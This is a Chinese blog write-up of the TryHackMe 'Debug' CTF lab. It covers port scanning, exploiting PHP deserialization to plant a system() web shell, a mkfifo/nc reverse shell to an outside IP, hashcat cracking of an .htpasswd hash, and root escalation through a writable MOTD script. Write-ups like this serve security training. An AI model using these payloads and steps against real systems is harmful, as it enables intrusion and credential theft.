TryHackMe-Debug(ez php反序列化)

最新推荐文章于 2024-07-11 18:55:16 发布
最新推荐文章于 2024-07-11 18:55:16 发布
阅读量418 收藏
点赞数 2
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: php TryHackMe php反序列化 权限提升 linux渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/129371739
版权

Debug

Linux机器CTF!您将了解枚举,查找隐藏的密码文件以及如何利用php反序列化!

端口扫描

循例,nmap

在这里插入图片描述

Web枚举

进到web是apache默认页面,直接开扫

在这里插入图片描述

在这里插入图片描述

由于题目告诉我们涉及php反序列化,那直接找php文件来看,这里下载index.php.bak

PHP 反序列化

非常简单的反序列化

”所有php里面的值都可以使用函数 serialize () 来返回一个包含字节流的字符串来表示。. unserialize () 函数能够重新把字符串变回php原来的值。. 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。. 为了能够 unserialize () 一个对象,这个对象的类必须已经定义过。. 如果序列化类A的一个对象,将会返回一个跟类A相关,而且包含了对象所有变量值的字符串。. 如果要想在另外一个文件中反序列化一个对象,这个对象的类必须在反序列化之前定义“

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

public function SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

	$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();


?>

这里对debug参数进行反序列并执行函数

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();

这里直接劫持form_file和message参数,然后重新序列化

public $form_file = 'cmd.php';
public $message = '<?php @system($_GET["cmd"]);?>';

$obj = new FormSubmit();

echo serialize($obj);

传过去:

在这里插入图片描述

开启nc监听,然后直接reverse shell

payload:

mkfifo /tmp/f1;nc 10.14.39.48 8888 < /tmp/f1 | /bin/bash > /tmp/f1

在这里插入图片描述

在这里插入图片描述

加固shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

横向移动

在home目录下有两个文件夹,但是无权访问

在这里插入图片描述

再看看服务账户的家目录下,看一下.htpasswd发现了james的凭据

在这里插入图片描述

这里可以使用hash-identifier查看类型然后再查看hashcat -h找找类型值

为了方便我这里使用haiti-hash,这个工具直接给出hashcat和john的对应类型值

在这里插入图片描述

hashcat爆破:

hashcat -a 0 -m 1600 ./hash /usr/share/wordlists/rockyou.txt

在这里插入图片描述

直接登录james的ssh

在这里插入图片描述

权限提升

查看.bash_history

在这里插入图片描述

发现该目录下的文件james组有权修改,这里可以执行命令

在这里插入图片描述

修改00-header

在这里插入图片描述

重新登录james的ssh

在这里插入图片描述

getroot

Sugobet
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
php-debug-pack-7.4.29-nts-Win32-vc15-x64
05-03
pack-7.4.29-nts-Win32-vc15-x64php-debug-pack-7.4.29-nts-Win32-vc15-x64php-debug-pack-7.4.2
vscode-php-debug:适用于Visual Studio CodePHP调试适配器
02-05
安装扩展:按F1 ,输入ext install php-debug 。 此扩展是Derick Rethans在VS Code和之间的调试适配器。 Xdebug是一个PHP扩展(在Linux上是.so文件,在Windows上是.dll ),需要在您的服务器上安装。 我强烈建议您...
[SWPUCTF 2022 新生赛]ez_ez_php
wyxlsm的博客
03-19 566
当你交这个flag值的时候 是不正确的 提示你 换个思路 去解题 直接。他是一个PHP伪加密使用一个得到。
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 546
[FSCTF 2023]ez_php1已解决
【SWPU NSS新生赛校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
weixin_46497491的博客
10-23 1240
【SWPU NSS新生赛校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_phpez_ez_php(revenge)
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3204
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
ejtag-debug-cygwin-v3.8.2.rar
11-27
《ejtag-debug-cygwin-v3.8.2:龙芯1B芯片的EJTAG调试工具详解》 在嵌入式系统开发中,调试工具是至关重要的环节,尤其对于龙芯1B这样的处理器,其烧录和调试过程需要特定的软件支持。"ejtag-debug-cygwin-v3.8.2....
Django 开发调试工具 Django-debug-toolbar使用详解
09-19
**Django调试利器:Django-debug-toolbar** Django-debug-toolbar是一款强大的开源调试工具,它为Django开发者提供了丰富的请求和响应信息,帮助开发者快速定位和解决问题。通过在Django项目的界面中集成一系列可...
ios-webkit-debug-proxy-1.9.0-win64-bin
07-19
ios-webkit-debug-proxy-1.9.0-win64-bin
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4599
前言 最近经常见到BJDCTF赛题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和解题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base解码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
BJDctf2020 Ezphp
qq_62984336的博客
03-14 657
BJDctf2020 Ezphp 目录 BJDctf2020 Ezphp 2.preg_match绕过 3.$_REQUEST绕过 4.file_get_contents绕过 5.sha1函数、比较类型数组绕过 6.create_function运用 0.01先查看源码,找到一串疑似base32编码的,解码得到1nD3x.php 0.02访问/1nD3x.php得到源文件 <?php highlight_file(__FILE__); error_reporti.
php view 视图 mvc,ez: 一个极简的php mvc框架,支持5种内置视图引擎,支持视图引擎扩展...
weixin_39849762的博客
03-10 405
EZ Framework for PHPauthor: xiaozhuai关于EZ是一个php mvc框架,它轻量,美丽而性感。为什么使用EZ? 因为它EASY! :)维基这里是一个使用EZ搭建的应用示例,你可以参照这个项目来使用EZ。Hello World让我们从最简单的Hello World开始1. 创建一个apache .htaccess 文件RewriteEngine On#ignore ...
HECTF2020题解之ezphp
Mrs_H的博客
01-04 705
HECTF2020题解之ezphp 一 题目的来源 这道题的前身来源于NCTF2019的一道题名为“easyphp”,在HECTF中并没有完全复刻上述的题目,只是对其中的两个考点进行了参考,这篇文章也将对这其中的两个考点进行讲述。本文在在行文过程中同样参考了NCTF2019的官方wp,链接会放在文章最后。 二 题目描述 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 649
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1152
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
数据结构第14节 加权图
hummhumm的专栏
07-07 1329
( V ) 是顶点的集合。( E ) 是边的集合,每条边连接 ( V ) 中的一对顶点。( W ) 是一个函数,将每条边映射到一个实数上,即 ( W: E \rightarrow \mathbb{R} )。
Vulnhub靶场DC-6练习
Reset
07-08 956
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
最新发布
weixin_51520483的博客
07-11 97
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
怎么安装felixfbecker.php-debug”扩展
04-07
安装felixfbecker.php-debug扩展可以通过以下步骤进行: 1. 打开终端或命令行工具,运行以下命令安装pecl: ``` sudo apt-get install php-pear ``` 2. 运行以下命令安装php-dev: ``` sudo apt-get install ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值